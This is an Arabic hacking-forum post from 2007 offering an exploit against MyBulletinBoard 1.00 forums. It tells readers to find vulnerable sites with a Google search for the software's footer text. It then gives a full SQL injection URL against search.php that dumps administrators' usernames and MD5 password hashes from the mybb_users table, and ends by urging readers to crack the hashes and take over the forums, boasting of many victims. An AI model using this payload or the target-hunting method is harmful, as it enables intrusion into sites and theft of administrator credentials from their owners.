منتدى الغنزيز
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

منتدى الغنزيز

منتدانا يرحب بكم
 
الرئيسيةأحدث الصورالتسجيلدخول

 

 ثغرة حلوه في منتديات MyBulletin لعيونكم و الاصابات كتــــير

اذهب الى الأسفل 
كاتب الموضوعرسالة
Admin
Admin
Admin
avatar


عدد الرسائل : 149
تاريخ التسجيل : 15/02/2007

ثغرة حلوه في منتديات MyBulletin لعيونكم و الاصابات كتــــير Empty
مُساهمةموضوع: ثغرة حلوه في منتديات MyBulletin لعيونكم و الاصابات كتــــير   ثغرة حلوه في منتديات MyBulletin لعيونكم و الاصابات كتــــير Icon_minitimeالسبت فبراير 17, 2007 4:16 pm

السلام عليكم

ثغرة اليوم فى منتديات MyBulletinBoard
لكن بكون الباسورد هاش MD5
يعنى لو مش مستعد للهاش دة يبقى اعمل باك Back :s7: على شان دماغك مش رايقة

بسم الله

ادخل Goolge.com
و ضع هذا الكود Powered by MyBulletinBoard 1.00 Release

هيطلع نتائج كتير مثل جيب دةImage hosted by servimg.com
اول ما هندخل السيت هيبقى كدة ( http://www.Ar-HaCkEr.com/forum ) بعد المنتدى كلمة forum ضع هذا الكود

كود:
search.php?action=finduser&uid=-1'%20UNION%20SELECT%20uid,uid,uid,uid,uid,uid,uid, uid,uid,uid,uid,uid,uid,uid,uid,username,password% 20FROM%20mybb_users%20where%20usergroup=4
Image hosted by servimg.com
راح يجك هذة الصورة
Image hosted by servimg.com
انتظر ثانية واحد و راح تحصل على الباسورد و اسم الادمن كما يلى
Image hosted by servimg.com

و ألفين مبروووووووك يا نجم
و الان ما عليك بس انك تفك و استمتع بالمنتدى

ملحوظة : ممكن بعد وضع الكود و يحمل الصورة الثانية يدخل على صفحة بيضة يبقى الثغرة مش موجودة بالمنتدى

المصدر ( هنـــــــــا )

http://www.securityfocus.com/archive/1/408624 تحياتى للجميع
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://slimoks.yoo7.com
 
ثغرة حلوه في منتديات MyBulletin لعيونكم و الاصابات كتــــير
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتدى الغنزيز :: ~*¤ô§ô¤*~منتديات الهاك ~*¤ô§ô¤*~ :: متدى الثغرات و Exploit-
انتقل الى: